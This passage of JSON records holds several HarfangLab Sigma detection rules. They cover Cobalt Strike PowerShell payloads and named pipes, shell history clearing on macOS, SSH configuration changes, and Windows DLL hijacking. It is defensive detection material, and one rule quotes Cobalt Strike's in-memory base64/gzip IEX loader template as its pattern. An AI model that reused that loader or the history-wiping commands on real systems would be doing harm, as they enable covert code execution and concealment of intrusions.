"0e0fd26d-b447-4686-acd2-ce93cce97b88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:34.091588Z", + "creation_date": "2026-03-23T11:45:34.091590Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.091595Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://gchq.github.io/CyberChef/", + "https://attack.mitre.org/techniques/T1059/001/", + "https://attack.mitre.org/software/S0154/" + ], + "name": "t1059_001_cobalt_powershell_compress.yml", + "content": "title: Cobalt Strike PowerShell Compressed Payload Detected\nid: 0e0fd26d-b447-4686-acd2-ce93cce97b88\ndescription: |\n Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\n The goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\n It is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\nreferences:\n - https://gchq.github.io/CyberChef/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2021/11/22\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand: '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"*\"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0e0fd26d-b447-4686-acd2-ce93cce97b88", + "rule_name": 
"Cobalt Strike PowerShell Compressed Payload Detected", + "rule_description": "Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\nThe goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\nIt is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\n", + "rule_creation_date": "2021-11-22", + "rule_modified_date": "2025-04-10", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0e12c12e-bea2-428e-ad86-734dcc2aff20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.073062Z", + "creation_date": "2026-03-23T11:45:34.073064Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.073069Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/", + "https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py", + "https://attack.mitre.org/techniques/T1021/002/" + ], + "name": "t1021_002_custom_cobaltstrike_named_pipes_created.yml", + "content": "title: Custom CobaltStrike Named Pipe Created\nid: 0e12c12e-bea2-428e-ad86-734dcc2aff20\ndescription: |\n Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - 
classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - '\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0e12c12e-bea2-428e-ad86-734dcc2aff20", + "rule_name": "Custom CobaltStrike Named Pipe Created", + "rule_description": "Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipe as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to 
self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n", + "rule_creation_date": "2022-07-08", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.002", + "attack.t1559" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.598235Z", + "creation_date": "2026-03-23T11:45:34.598241Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.598253Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1070/003/" + ], + "name": "t1070_003_history_file_removed_macos.yml", + "content": "title: Shell History File Cleared (macOS)\nid: 0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb\ndescription: |\n Detects the history file being removed.\n Attackers may clear the command history of a compromised account to conceal the 
actions undertaken during an intrusion.\n It is recommended to investigate other malicious actions that may have been taken by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2022/11/25\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_binary1:\n Image:\n - '/bin/rm'\n - '/bin/unlink'\n - '/bin/dd'\n - '/usr/bin/truncate'\n\n selection_binary2:\n Image:\n - '/bin/cat'\n - '/bin/echo'\n CommandLine|contains: \">\"\n\n selection_commandline:\n CommandLine|contains:\n - '.bash_history'\n - 'fish_history'\n - '.history'\n - '.sh_history'\n - '.zhistory'\n - '.zsh_history'\n\n # /bin/rm /Users//.zsh_sessions/.historynew\n exclusion_zsh_sessions:\n Image: '/bin/rm'\n CommandLine|endswith: '.historynew'\n\n exclusion_cursor:\n - GrandparentImage: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - ParentImage: '/Applications/Cursor.app/Contents/MacOS/Cursor'\n\n exclusion_vscode:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n\n condition: (1 of selection_binary* and selection_commandline) and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb", + "rule_name": "Shell History File Cleared (macOS)", + "rule_description": "Detects the history file being removed.\nAttackers may clear the command 
history of a compromised account to conceal the actions undertaken during an intrusion.\nIt is recommended to investigate other malicious actions that may have been taken by the parent process.\n", + "rule_creation_date": "2022-11-25", + "rule_modified_date": "2025-04-08", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1070.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0e4aa7c9-6644-49db-905a-46646475b8a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-24T07:14:08.726662Z", + "creation_date": "2026-03-23T11:45:35.297664Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.297668Z", + "rule_level": "high", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1021/004/", + "https://attack.mitre.org/techniques/T1563/001/", + "https://attack.mitre.org/techniques/T1484/" + ], + "name": "t1021_004_ssh_server_config_modified_linux.yml", + "content": "title: Suspicious Modification of the SSH Server Configuration\nid: 
0e4aa7c9-6644-49db-905a-46646475b8a2\ndescription: |\n Detects an attempt to modify the SSH server configuration file, which contains security settings.\n Attackers may alter these settings to weaken security.\n It is recommended to review file changes by downloading the file through a job, check access permissions and assess risks from these changes.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ssh/sshd_config'\n - TargetPath: '/etc/ssh/sshd_config'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_apk:\n - ProcessImage: '/sbin/apk'\n - ProcessParentImage: '/sbin/apk'\n - ProcessGrandparentImage: '/sbin/apk'\n - ProcessAncestors|contains: '|/usr/bin/apt|'\n exclusion_dpkg_postinstall:\n 
- ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n 
- '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_denyhost_sshd:\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/sbin/denyhost-sshd-plugin'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - 
'/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_puppet2:\n ProcessParentCommandLine: 'puppet agent: applying configuration'\n\n exclusion_qradar:\n ProcessCommandLine|startswith: '/bin/bash /opt/qradar/bin/post-deploy.sh'\n\n exclusion_puppet3:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0e4aa7c9-6644-49db-905a-46646475b8a2", + "rule_name": "Suspicious Modification of the SSH Server Configuration", + "rule_description": "Detects an attempt to modify the SSH server configuration file, which contains security settings.\nAttackers may alter these settings to weaken security.\nIt is recommended to review file changes by downloading the file through a job, check access permissions and assess risks from these changes.\n", + "rule_creation_date": "2022-11-07", + "rule_modified_date": "2026-03-23", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1021.004", + "attack.t1484", + "attack.t1563.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + 
"rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.088331Z", + "creation_date": "2026-03-23T11:45:34.088333Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.088337Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_bootim.yml", + "content": "title: DLL Hijacking via bootim.exe\nid: 0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1\ndescription: |\n Detects potential Windows DLL Hijacking via bootim.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 
2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootim.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\BootMenuUX.DLL'\n - '\\bootux.dll'\n - '\\Cabinet.dll'\n - '\\dbghelp.dll'\n - '\\DismApi.DLL'\n - '\\FLTLIB.DLL'\n - '\\OLEACC.dll'\n - '\\PROPSYS.dll'\n - '\\ReAgent.dll'\n - '\\ResetEng.dll'\n - '\\tbs.dll'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1", + "rule_name": "DLL Hijacking via bootim.exe", + "rule_description": "Detects potential Windows DLL Hijacking via bootim.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + 
"rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.079662Z", + "creation_date": "2026-03-23T11:45:34.079664Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.079668Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_applysettingstemplatecatalog.yml", + "content": "title: DLL Hijacking via ApplySettingsTemplateCatalog.exe\nid: 0e9afbf0-2bb7-4577-abdb-a763825ffb58\ndescription: |\n Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\n DLL hijacking takes 
advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ApplySettingsTemplateCatalog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\activeds.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58", + "rule_name": "DLL Hijacking via ApplySettingsTemplateCatalog.exe", + "rule_description": "Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a 
